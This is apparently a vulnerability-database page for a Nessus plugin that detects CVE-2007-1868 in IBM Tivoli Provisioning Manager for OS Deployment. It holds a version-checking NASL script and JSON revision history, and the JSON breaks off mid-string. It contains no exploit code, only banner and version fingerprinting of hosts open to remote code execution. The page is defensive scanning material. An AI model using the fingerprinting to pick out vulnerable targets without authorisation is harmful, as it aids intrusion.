IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows
2007-05-03T00:00:00
ID IBM_TPMFOSD_OVERFLOW.NASL Type nessus Reporter This script is Copyright (C) 2007-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
The remote host is running IBM Tivoli Provisioning Manager for OS
Deployment. The installed version of this software is affected by multiple
buffer overflow vulnerabilities in its HTTP server.
A remote attacker may exploit these flaws to crash the service or
execute code on the remote host with the privileges of the TPM server.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block: when `description` is set the script only declares its
# metadata (identifiers, texts, risk scoring, scheduling hints) and then exits,
# so none of the detection logic further down runs in this mode.
if (description)
{
# Plugin identity and the external vulnerability identifiers it maps to.
script_id(25149);
script_version("1.14");
script_cve_id("CVE-2007-1868");
script_bugtraq_id(23264);
script_name(english:"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows");
script_summary(english:"Gets IBM TPM for OS Deployment Server version");
# Texts shown in the scan report: synopsis, description, reference, solution.
script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by multiple vulnerabilities." );
script_set_attribute(attribute:"description", value:
"The remote host is running IBM Tivoli Provisioning Manager for OS
Deployment. The version of this software has multiple buffer overflow
vulnerabilities in the HTTP server.
A remote attacker may exploit these flaws to crash the service or
execute code on the remote host with the privileges of the TPM server." );
script_set_attribute(attribute:"see_also", value:"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" );
script_set_attribute(attribute:"solution", value:
"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2." );
# CVSS v2 base vector: network-reachable, low complexity, no authentication,
# complete impact on confidentiality, integrity and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
# CVSS v2 temporal vector: functional exploit, official fix, confirmed report.
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
# Exploit-availability flags; useful for prioritising remediation of a finding.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
# Timeline: plugin release versus patch and vulnerability disclosure dates.
script_set_attribute(attribute:"plugin_publication_date", value: "2007/05/03");
script_set_attribute(attribute:"patch_publication_date", value: "2007/04/01");
script_set_attribute(attribute:"vuln_publication_date", value: "2007/04/01");
script_cvs_date("Date: 2018/07/12 19:01:16");
# "remote": the check is performed over the network rather than on the host.
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment");
script_end_attributes();
# Scheduling hints: information-gathering category, "Web Servers" family,
# runs after http_version.nasl and only against the listed web ports.
script_category(ACT_GATHER_INFO);
script_family(english:"Web Servers");
script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 8080, 443);
# Stop here in description mode; the detection code below must not run.
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
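# Detection logic.
#
# This is a version check only: it reads the product version that the server
# prints on /builtin/index.html and compares it with 5.1.0.2 (build 12.4).
# It never sends an overflow trigger, so a finding means "the advertised
# version is older than the fixed one", not "the flaw was exercised".

port = get_http_port(default:8080);

# Skip servers whose banner does not carry the "Server: Rembo" header.
banner = get_http_banner(port:port);
if ("Server: Rembo" >!< banner)
  exit(0);

w = http_send_recv3(method:"GET", item:"/builtin/index.html", port:port);
if (isnull(w)) exit(1, "the web server did not answer");
res = w[2];

# Group 1 is the four-part product version, group 2 the two-part build number.
pat = '<p style="font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;"><b>TPMfOSd ([0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+) \\(build ([0-9]+\\.[0-9]+)\\)</b>.*';

version = egrep(pattern:pat, string:res);
if (!version)
  exit(0);

# Take the capture groups straight from the match. The previous ereg_replace()
# approach replaced only the matched part of the line, so any markup or text
# preceding the <p> tag stayed glued to the version string; int() then parsed
# the first component as 0 and the host was reported as vulnerable.
match = eregmatch(pattern:pat, string:version);
if (isnull(match))
  exit(0);

vers  = split(match[1], sep:".", keep:FALSE);
build = split(match[2], sep:".", keep:FALSE);

major = int(vers[0]);
minor = int(vers[1]);
rev   = int(vers[2]);
fix   = int(vers[3]);

vulnerable = FALSE;

if ( (major < 5) ||
     (major == 5 && minor < 1) ||
     (major == 5 && minor == 1 && rev == 0 && fix < 2) )
{
  # Anything older than 5.1.0.2 is flagged regardless of its build number.
  vulnerable = TRUE;
}
else if (major == 5 && minor == 1 && rev == 0 && fix == 2)
{
  # 5.1.0.2 is only flagged when its build number is lower than 12.4.
  if ( (int(build[0]) < 12) ||
       (int(build[0]) == 12 && int(build[1]) < 4) )
    vulnerable = TRUE;
}

if (vulnerable)
{
  # Include the observed version so the finding can be verified and triaged.
  if (report_verbosity > 0)
  {
    report = '\n  Installed version : ' + match[1] + ' (build ' + match[2] + ')\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}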
{"id": "IBM_TPMFOSD_OVERFLOW.NASL", "bulletinFamily": "scanner", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "description": "The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.", "published": "2007-05-03T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/25149", "reporter": "This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "cvelist": ["CVE-2007-1868"], "type": "nessus", "lastseen": "2019-11-01T02:47:28", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. 
\n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 1, "enchantments": {}, "hash": "0dc0418a568d5688c2ce2bf2ea45f12027a5e05e0dc58a33152dea9d055c3759", "hashmap": [{"hash": "21aa82398f468d79000a4b0501c135c0", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "27b8e3211f7f9110f9452c2eb0697551", "key": "sourceData"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2016-09-26T17:25:44", "modified": "2012-10-03T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.2", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"$Revision: 1.13 $\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n script_osvdb_id(34678);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n 
script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"$Date: 2012/10/03 21:39:19 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2012 Tenable Network 
Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:44"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. 
The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a5d707b1311256cc26f7c718e33a981ff66711c862a473ad5048dabaf36801f8", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2018-07-13T10:10:56", "modified": "2018-07-12T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n 
script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web 
Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-13T10:10:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. 
The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-10-28T20:31:18", "references": [{"idList": ["MSF:EXPLOIT/WINDOWS/HTTP/IBM_TPMFOSD_OVERFLOW"], "type": "metasploit"}, {"idList": ["PACKETSTORM:83093"], "type": "packetstorm"}, {"idList": ["EDB-ID:16810"], "type": "exploitdb"}, {"idList": ["IBM_TPMFOSD_CORRUPTION.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:VULN:7526", "SECURITYVULNS:VULN:7566", "SECURITYVULNS:DOC:16934"], "type": "securityvulns"}, {"idList": ["CVE-2007-1868"], "type": "cve"}, {"idList": ["OSVDB:34678"], "type": "osvdb"}]}, "score": {"modified": "2019-10-28T20:31:18", "value": 9.1, "vector": "NONE"}}, "hash": "0835fdd4c49681b2d2d96dd99212a456bd12059699cd63cccb7ddf56b27034a2", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "bd78ab9e79208a1da8b5ab749c184394", "key": "description"}, {"hash": "828360cd7777de6cfb948a0046bacf67", "key": "reporter"}, {"hash": "f4d1f5e609cae4ee6d91e16160ff5ec0", "key": "href"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": 
"https://www.tenable.com/plugins/nessus/25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2019-10-28T20:31:18", "modified": "2019-10-02T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. 
\n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif 
(isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 2}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-10-28T20:31:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. 
\n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a5d707b1311256cc26f7c718e33a981ff66711c862a473ad5048dabaf36801f8", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2018-09-01T23:59:06", "modified": "2018-07-12T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n 
script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network 
